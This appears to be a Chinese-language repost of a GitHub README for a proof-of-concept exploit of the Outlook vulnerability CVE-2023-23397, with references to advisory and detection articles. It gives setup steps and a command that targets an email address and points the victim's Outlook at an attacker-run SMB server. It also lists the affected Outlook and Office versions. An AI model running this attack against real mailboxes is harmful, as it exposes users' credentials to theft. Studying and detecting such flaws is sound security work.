Python 中针对影响 Microsoft Office/365 产品的 Outlook CVE 的快速简单的“概念证明”。
用法
通过运行安装
pywinpip install pywin32
在攻击者机器上启动SMB服务器,比如Metasploit的SMB模块
运行
python Exploit.py <save_or_send> <target email> <attacker_ip>
传递命令(保存或发送)、目标电子邮件地址和攻击者机器的 IP
项目地址:https://github.com/tiepologian/CVE-2023-23397
这会影响所有版本的 Microsoft Outlook for Windows。根据 Microsoft 博客,其他版本的 Microsoft Outlook(例如 Android、iOS、Mac)以及 Outlook 网页版和其他 M365 服务不受影响
Microsoft Outlook 2016(64 位版本)
Microsoft Outlook 2013 Service Pack 1(32 位版本)
Microsoft Outlook 2013 RT Service Pack 1
Microsoft Outlook 2013 Service Pack 1(64 位版本)
Microsoft Office 2019(32 位版本)
Microsoft 365适用于 32 位系统的企业应用
Microsoft Office 2019 适用于 64 位版本
Microsoft 365 适用于企业的应用适用于 64 位系统
Microsoft Office LTSC 2021 适用于 64 位版本
Microsoft Outlook 2016(32 位版本)
Microsoft Office LTSC 2021 适用于 32 -位版本
参考:
https://securityboulevard.com/2023/03/coverage-advisory-for-cve-2023-23397-microsoft-outlook-elevation-of-privilege-vulnerability/
https://socprime.com/blog/detect-cve-2023-23397-exploits-critical-elevation-of-privilege-vulnerability-in-microsoft-outlook-leveraged-in-the-wild-to-target-european-government-and-military/